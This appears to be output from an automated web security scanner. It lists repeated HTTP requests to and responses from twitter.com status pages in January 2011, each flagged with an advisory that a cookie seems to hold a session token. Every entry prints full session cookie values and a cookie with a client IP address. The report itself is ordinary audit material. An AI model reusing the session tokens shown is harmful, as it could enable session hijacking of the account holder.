HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:27:44 GMT Server: hi Status: 200 OK X-Transaction: 1296224864-76272-48360 ETag: "c834532c607a57bdbcfb09d898913ad5" Last-Modified: Fri, 28 Jan 2011 14:27:44 GMT X-Runtime: 0.06435 Content-Type: text/html; charset=utf-8 Content-Length: 13839 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODIwNjM2MzYxNjIxNTA0MDoMY3NyZl9pZCIlMzJhZDdhZWE4YTVi%250ANmI0N2NhYjc2Y2UzNjcwYmQ5NGQ6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--14d983691f33e1b982c79a5b234b9091c5640cfd; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/status/28450557672824832 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:27:22 GMT Server: hi Status: 200 OK X-Transaction: 1296224842-72786-11424 ETag: "8a913eb0d26cf4b51ef377e6d58d6b3a" Last-Modified: Fri, 28 Jan 2011 14:27:22 GMT X-Runtime: 0.06597 Content-Type: text/html; charset=utf-8 Content-Length: 13675 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODQ1MDU1NzY3MjgyNDgzMjoMY3NyZl9pZCIlNWU2ZTIzZGIyYjk5%250AODhkOTAwNjg4NThhZjkxOGU2MmU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--e2496f1dbb064b5c8414d329ac11463253046feb; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/status/28451243869339648 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:26:19 GMT Server: hi Status: 200 OK X-Transaction: 1296224779-24208-21272 ETag: "4dec5d0def9c15c79fc9b85459882692" Last-Modified: Fri, 28 Jan 2011 14:26:19 GMT X-Runtime: 0.05780 Content-Type: text/html; charset=utf-8 Content-Length: 13734 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODQ1MTI0Mzg2OTMzOTY0ODoMY3NyZl9pZCIlY2UxZTYzZWM1Mzhi%250ANzUwOTg5MmZhODg2NzBlNTE3ZmE6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--92abfd30a75287ea7b714b4c2d719303b28dc49f; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/status/29343613573926913 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:26:08 GMT Server: hi Status: 200 OK X-Transaction: 1296224768-45229-19192 ETag: "61be2a00c7b94607e218eb5ebb7189c0" Last-Modified: Fri, 28 Jan 2011 14:26:08 GMT X-Runtime: 0.04251 Content-Type: text/html; charset=utf-8 Content-Length: 13824 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTM0MzYxMzU3MzkyNjkxMzoMY3NyZl9pZCIlMDhhNzE0NWUzZGQy%250AYThjMGFmMzNlOGU2N2YzMWMyNmI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--d7b87ffd3961937960551fd20ef085add3dc652a; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/status/29343882311372800 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:52 GMT Server: hi Status: 200 OK X-Transaction: 1296224752-86611-17718 ETag: "8e8ba1c134c1602542f62fdaa8e9f7dd" Last-Modified: Fri, 28 Jan 2011 14:25:52 GMT X-Runtime: 0.05141 Content-Type: text/html; charset=utf-8 Content-Length: 13680 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTM0Mzg4MjMxMTM3MjgwMDoMY3NyZl9pZCIlOTMwZjZkOTU4Nzcz%250AZmZlODFmOTdmMGIwMjJjZmMwZTk6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--4ec685a9450e1b8fefd04b4578645a1edde9bad3; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/status/29510556067041280 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:52 GMT Server: hi Status: 200 OK X-Transaction: 1296224752-42900-60801 ETag: "d61b7e8839b68f0e6bbfeea3f24f11e7" Last-Modified: Fri, 28 Jan 2011 14:25:52 GMT X-Runtime: 0.06556 Content-Type: text/html; charset=utf-8 Content-Length: 13632 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTUxMDU1NjA2NzA0MTI4MDoMY3NyZl9pZCIlYjkxNjUxMjBkZmM0%250AYTJhMGUyNjZiZDRjZWFhMTg5YzQ6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--879a5af66cf85b03132a55e267e75f8e107db447; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/status/29705355999055872 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:51 GMT Server: hi Status: 200 OK X-Transaction: 1296224751-25049-63292 ETag: "f4d24b4b0ce19c88101731df05975e44" Last-Modified: Fri, 28 Jan 2011 14:25:51 GMT X-Runtime: 0.26212 Content-Type: text/html; charset=utf-8 Content-Length: 13555 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTcwNTM1NTk5OTA1NTg3MjoMY3NyZl9pZCIlNDAwZjBkMzA5YTgy%250AYzk1NGFhZGY3Y2YxMWZhNTEzNTI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--c0d59aed3199a40c6a1fc20a84673263ba8b0524; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/status/30065585396121601 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:47 GMT Server: hi Status: 200 OK X-Transaction: 1296224746-71315-7024 ETag: "53739e8689a75eb0e462fb3f46dbe87a" Last-Modified: Fri, 28 Jan 2011 14:25:46 GMT X-Runtime: 0.06652 Content-Type: text/html; charset=utf-8 Content-Length: 13645 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDA2NTU4NTM5NjEyMTYwMToMY3NyZl9pZCIlNWViNDc0NjJhYjUy%250AYmJiMjUwZjk0ZjZiY2Q5NWQ2MjM6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--a5345f31cffd9fbf70b4a6bddd83fd98f48576ba; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/status/30103594925555712 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:44 GMT Server: hi Status: 200 OK X-Transaction: 1296224744-39713-23366 ETag: "7bb96996c6739d3b30a2757944a67cce" Last-Modified: Fri, 28 Jan 2011 14:25:44 GMT X-Runtime: 0.05847 Content-Type: text/html; charset=utf-8 Content-Length: 13787 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDEwMzU5NDkyNTU1NTcxMjoMY3NyZl9pZCIlZGQ5ZmU5ZmYzMGNm%250AMjhiMDY0MzgzM2U2NGNjMzJlMDY6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--176b58f6205e5a5aa6ed8ffb4443a86e18553832; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/status/30232367046074369 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:42 GMT Server: hi Status: 200 OK X-Transaction: 1296224742-9041-16904 ETag: "d3e65130366342526ec8ade660cf3dbb" Last-Modified: Fri, 28 Jan 2011 14:25:42 GMT X-Runtime: 0.04768 Content-Type: text/html; charset=utf-8 Content-Length: 13683 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDIzMjM2NzA0NjA3NDM2OToMY3NyZl9pZCIlYTM3MGRmOTZhODQz%250AM2RiNDBlMmY1M2I5OTM2NjFmYjE6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--e05cd9620525d156ee51f67a18a4e6ea60c33e75; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/status/30417132269346816 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:42 GMT Server: hi Status: 200 OK X-Transaction: 1296224742-7004-30272 ETag: "da9e6ffc8f0c311694071739765bd753" Last-Modified: Fri, 28 Jan 2011 14:25:42 GMT X-Runtime: 0.04299 Content-Type: text/html; charset=utf-8 Content-Length: 13699 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQxNzEzMjI2OTM0NjgxNjoMY3NyZl9pZCIlYzFhNDVhNDY0ZjBj%250ANTkyYTUyYTU1YjI1ZjJjN2VmZDg6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--1619ced3ca9bc9fa08b4a84d7d647b1b47a62ad4; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /malsup/status/30418291201679360 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:40 GMT Server: hi Status: 200 OK X-Transaction: 1296224740-43275-1259 ETag: "b36130e1f840ffcb8130031180af8a87" Last-Modified: Fri, 28 Jan 2011 14:25:40 GMT X-Runtime: 0.07149 Content-Type: text/html; charset=utf-8 Content-Length: 13636 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQxODI5MTIwMTY3OTM2MDoMY3NyZl9pZCIlNjZjMzQ2MThjNmJl%250ANjFjN2ZmMzBjNjgyMTNiYzQ1N2Q6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--be54aaa7f049891a1ab52a41024afae2053a60f4; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
